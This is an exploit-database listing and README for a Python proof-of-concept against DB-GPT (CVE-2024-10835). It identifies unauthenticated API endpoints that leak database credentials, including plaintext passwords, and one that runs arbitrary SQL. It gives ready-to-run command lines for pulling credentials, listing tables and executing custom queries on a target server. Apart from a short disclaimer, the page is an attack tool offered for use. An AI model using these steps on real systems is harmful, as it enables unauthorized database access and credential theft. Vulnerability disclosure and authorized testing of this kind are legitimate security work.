Exploit for SQL Injection in Dbgpt Db-Gpt CVE-2024-10835

Name: Exploit for SQL Injection in Dbgpt Db-Gpt CVE-2024-10835
Rating: 5 (137 reviews)
2026-03-04 | CVSS 9.8
## https://sploitus.com/exploit?id=C5FBFC37-5494-521E-B114-650D7804C396
# DBGPT Unauthenticated Information Disclosure & SQL Execution PoC

## Vulnerability Description

This tool integrates scripts for exploiting two critical vulnerabilities in DBGPT, which involve sensitive information disclosure and unauthorized SQL execution. ### 1. Sensitive Information Disclosure
- **Vulnerability ID**: CNVD-2026-12436 / CVE-2024-10835 (associated)
- **Vulnerable APIs**: `/api/v2/serve/datasources`, `/api/v1/chat/db/list`
- **Impact**: Unauthorized attackers can directly access database configuration APIs and obtain sensitive information such as database host, port, username, and **plaintext passwords**. ### 2. Unauthenticated SQL Execution
- **Vulnerable API**: `/api/v1/editor/chart/run`
- **Impact**: Attackers can use the leaked or guessed database name (`db_name`) to construct malicious chart generation requests, allowing them to execute arbitrary SQL statements in the target database. ## Requirements

- Python 3.x
- requests

```bash
pip install requests
```

## Usage

```bash
python dbgpt_poc.py -u [options]
```

### Parameter Explanation

- `-u, --url`: Target DBGPT server address (e.g., `https://dbgpt.example.com`)
- `-s, --sql`: SQL statement to execute (default: `SELECT VERSION();`)
- `--db`: Specifies the database name to exploit (optional. If not specified, the script will attempt to extract it from the leaked data source).

## Examples

### 1. Automatic Detection and Verification
The simplest usage allows the script to automatically attempt to obtain database credentials and execute a version query on the first discovered database. ```bash
python dbgpt_poc.py -u https://dbgpt.example.com
```

### 2. Executing Custom SQL
To obtain the current database user:
```bash
python dbgpt_poc.py -u https://dbgpt.example.com --sql "SELECT user();"
```

To list all table names:
```bash
python dbgpt_poc.py -u https://dbgpt.example.com --sql "SHOW TABLES;"
```

### 3. Specifying Database Name
If automatic detection fails but you know the target database name (e.g., `dm_manufacturedb`):
```bash
python dbgpt_poc.py -u https://dbgpt.example.com --db "dm_manufacturedb" --sql "SELECT VERSION();"
```

## Disclaimer

This tool is intended for security research and authorized testing purposes only. Use is strictly prohibited for illegal attacks. Any consequences arising from using this tool are the responsibility of the user.